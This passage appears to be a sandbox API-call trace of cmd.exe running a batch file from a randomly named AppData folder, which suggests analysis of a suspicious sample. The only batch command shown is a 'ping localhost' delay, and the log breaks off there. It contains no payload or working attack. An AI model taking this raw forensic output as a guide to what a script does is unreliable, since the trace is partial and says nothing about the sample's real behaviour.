(in: lpPerformanceCount=0x28fc94 | out: lpPerformanceCount=0x28fc94*=16620974359) returned 1 [0109.421] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0109.421] __set_app_type (_Type=0x1) [0109.421] __p__fmode () returned 0x76b331f4 [0109.421] __p__commode () returned 0x76b331fc [0109.421] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0109.422] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0109.422] GetCurrentThreadId () returned 0xcf0 [0109.422] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf0) returned 0x38 [0109.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.422] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0109.422] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.422] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.422] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fc2c | out: phkResult=0x28fc2c*=0x0) returned 0x2 [0109.422] VirtualQuery (in: lpAddress=0x28fc63, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0109.423] GetConsoleOutputCP () returned 0x1b5 [0109.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.423] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0109.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.423] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0109.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.423] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0109.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.423] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0109.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0109.424] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.424] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0109.424] GetEnvironmentStringsW () returned 0x330150* [0109.424] FreeEnvironmentStringsW (penv=0x330150) returned 1 [0109.424] GetEnvironmentStringsW () returned 0x330150* [0109.424] FreeEnvironmentStringsW (penv=0x330150) returned 1 [0109.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb9c | out: phkResult=0x28eb9c*=0x40) returned 0x0 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x0, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x0, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegCloseKey (hKey=0x40) returned 0x0 [0109.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb9c | out: phkResult=0x28eb9c*=0x40) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x0, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x9, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x9, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x9, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegCloseKey (hKey=0x40) returned 0x0 [0109.425] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886356 [0109.425] srand (_Seed=0x5b886356) [0109.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"" [0109.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"" [0109.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3319b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0109.426] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.426] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.426] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.426] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.426] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.426] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0109.426] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0109.426] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0109.426] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0109.426] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0109.426] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0109.426] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0109.426] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0109.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f968 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f968, lpFilePart=0x28f964 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f964*="Desktop") returned 0x18 [0109.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.427] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f6e4 | out: lpFindFileData=0x28f6e4) returned 0x32ffe0 [0109.427] FindClose (in: hFindFile=0x32ffe0 | out: hFindFile=0x32ffe0) returned 1 [0109.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f6e4 | out: lpFindFileData=0x28f6e4) returned 0x32ffe0 [0109.427] FindClose (in: hFindFile=0x32ffe0 | out: hFindFile=0x32ffe0) returned 1 [0109.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f6e4 | out: lpFindFileData=0x28f6e4) returned 0x32ffe0 [0109.427] FindClose (in: hFindFile=0x32ffe0 | out: hFindFile=0x32ffe0) returned 1 [0109.427] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.427] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0109.427] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0109.428] GetEnvironmentStringsW () returned 0x330150* [0109.428] FreeEnvironmentStringsW (penv=0x330150) returned 1 [0109.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.430] GetConsoleOutputCP () returned 0x1b5 [0109.430] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.430] GetUserDefaultLCID () returned 0x409 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28faa8, cchData=128 | out: lpLCData="0") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28faa8, cchData=128 | out: lpLCData="0") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28faa8, cchData=128 | out: lpLCData="1") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0109.431] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.432] GetConsoleTitleW (in: lpConsoleTitle=0x3301e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.433] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0109.433] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0109.433] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0109.436] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", _String2=")") returned 58 [0109.436] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 3 [0109.436] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 3 [0109.436] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 6 [0109.437] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 6 [0109.437] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 15 [0109.437] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 15 [0109.437] GetConsoleTitleW (in: lpConsoleTitle=0x28f7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.475] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f55c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f554, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f554*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.475] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0109.476] SetErrorMode (uMode=0x0) returned 0x0 [0109.476] SetErrorMode (uMode=0x1) returned 0x0 [0109.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x33dc08, lpFilePart=0x28f2c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x28f2c0*="vMfCCeRYkvQy") returned 0x2d [0109.476] SetErrorMode (uMode=0x0) returned 0x1 [0109.476] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0109.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.481] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.481] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", fInfoLevelId=0x1, lpFindFileData=0x28f05c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f05c) returned 0x3308f0 [0109.481] FindClose (in: hFindFile=0x3308f0 | out: hFindFile=0x3308f0) returned 1 [0109.481] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0109.481] GetConsoleTitleW (in: lpConsoleTitle=0x28f534, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.481] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0109.484] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0109.485] IdentifyCodeAuthzLevelW () returned 0x1 [0109.490] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0109.490] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0109.490] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0109.490] CloseCodeAuthzLevel () returned 0x1 [0109.491] SetErrorMode (uMode=0x0) returned 0x0 [0109.491] SetErrorMode (uMode=0x1) returned 0x0 [0109.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", nBufferLength=0x104, lpBuffer=0x3304e8, lpFilePart=0x28f420 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", lpFilePart=0x28f420*="Gy2dwmVF.cmd") returned 0x3a [0109.491] SetErrorMode (uMode=0x0) returned 0x1 [0109.491] CmdBatNotification () returned 0x0 [0109.491] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0109.491] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0109.491] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.491] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.491] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.491] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.491] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x91, lpOverlapped=0x0) returned 1 [0109.491] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0109.492] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.492] GetFileType (hFile=0x58) returned 0x1 [0109.492] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.492] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.492] _wcsicmp (_String1="ping", _String2=")") returned 71 [0109.492] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0109.492] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0109.492] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0109.492] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0109.492] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0109.492] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0109.493] _tell (_FileHandle=3) returned 21 [0109.493] _close (_FileHandle=3) returned 0 [0109.494] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f21c | out: _Buffer="\r\n") returned 2 [0109.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.494] GetFileType (hFile=0x7) returned 0x2 [0109.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.494] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1dc | out: lpMode=0x28f1dc) returned 1 [0109.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.494] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f208, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f208*=0x2) returned 1 [0109.494] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.494] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f218 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0109.494] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f218 | out: _Buffer=">") returned 1 [0109.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.494] GetFileType (hFile=0x7) returned 0x2 [0109.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.494] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1e0 | out: lpMode=0x28f1e0) returned 1 [0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f20c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f20c*=0x19) returned 1 [0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] GetFileType (hFile=0x7) returned 0x2 [0109.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f464 | out: lpMode=0x28f464) returned 1 [0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x330958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f490, lpReserved=0x0 | out: lpBuffer=0x330958*, lpNumberOfCharsWritten=0x28f490*=0x4) returned 1 [0109.495] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f49c | out: _Buffer=" -n 3 localhost ") returned 16 [0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] GetFileType (hFile=0x7) returned 0x2 [0109.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f45c | out: lpMode=0x28f45c) returned 1 [0109.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x28f488, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f488*=0x10) returned 1 [0109.496] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f4bc | out: _Buffer="\r\n") returned 2 [0109.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.496] GetFileType (hFile=0x7) returned 0x2 [0109.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f47c | out: lpMode=0x28f47c) returned 1 [0109.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f4a8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f4a8*=0x2) returned 1 [0109.496] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0109.496] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0109.496] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0109.496] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0109.496] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0109.496] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0109.496] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0109.496] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0109.496] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0109.496] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0109.496] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0109.496] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 